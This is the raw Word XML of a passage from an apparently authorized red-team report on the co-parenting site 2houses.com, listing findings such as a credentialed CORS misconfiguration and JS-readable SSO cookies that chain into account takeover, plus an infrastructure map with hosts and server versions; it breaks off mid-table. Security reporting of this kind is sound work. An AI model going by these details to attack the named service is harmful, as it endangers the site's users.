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rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CONFIDENTIAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Red Team Assessment Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>2houses.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Assessment date: 22 April 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scope: External + authenticated self-test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Non-destructive engagement, read-only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="2400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Handle as internal confidential material.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Red Team Assessment — 2houses.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Target:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2houses SAS), a co-parenting platform for separated / divorced parents.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Engagement:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authorized red-team — Scope A (external) + Scope B (authenticated self-test on test account </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>kotrotsos@gmail.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">).  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Engagement date:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2026-04-22  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Rules:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Non-destructive, read-only on authenticated surface; no new records; minimal trace.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Engineer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> working from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/Users/marcokotrotsos/PERSONAL/reverse-engineer/2houses/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="999999"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Executive summary</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Pr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
            <w:shd w:fill="8B0000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">F-003 Reflective-origin CORS + credentials on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>/api/v1/*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">F-001 JS-readable SSO cookies, cross-subdomain, no HttpOnly / SameSite; F-006 HTML-in-JSON stored-XSS surface on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>/agenda/events.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>F-002 Staging environments public; F-005 Mouseflow session replay on auth pages; F-007 No CSP; F-008 WordPress install behind www</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
            <w:shd w:fill="567EA2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>F-004 Predictable S3 bucket names (correctly configured private)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The dominant theme is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cookie and CORS hygiene on the cross-domain SSO path between `accounts.2houses.com` and `tools.2houses.com`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. A single reflective-origin CORS misconfiguration (F-003) combined with JS-readable SSO tokens (F-001) is the critical compound that a reasonably skilled attacker can chain into account takeover via a single victim visit to a malicious page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Everything else is cleanup work — missing CSP, session replay on login, public staging, CSRF-via-CORS on auth JSON endpoints, a WordPress install somewhere that shouldn't be forgotten.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Infrastructure is commendably simple (three hosts, three providers, Rails + Devise everywhere). The app is not fashionable but it's well-built for what it does. The issues are configuration, not architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="999999"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>What we found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Infrastructure map</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shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hosting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>www.2houses.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Marketing site</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rails 5/6 + Webpacker + Sprockets + Turbolinks 5 + ActionCable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Heroku behind Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rails-UJS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>accounts.2houses.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Auth service (Devise)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rails + Devise + Omniauth (Apple/FB/Google) + Backbone + Simple_form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cloud66</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (nginx + Phusion Passenger 6.0.10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rails Devise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>tools.2houses.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Post-auth app for 2houses staff / customer support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Rails + internal session </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>_onehouse_session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Cloud66 (Passenger 6.0.5 — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>older</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>my.2houses.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>User-facing app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Unknown (no response to HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
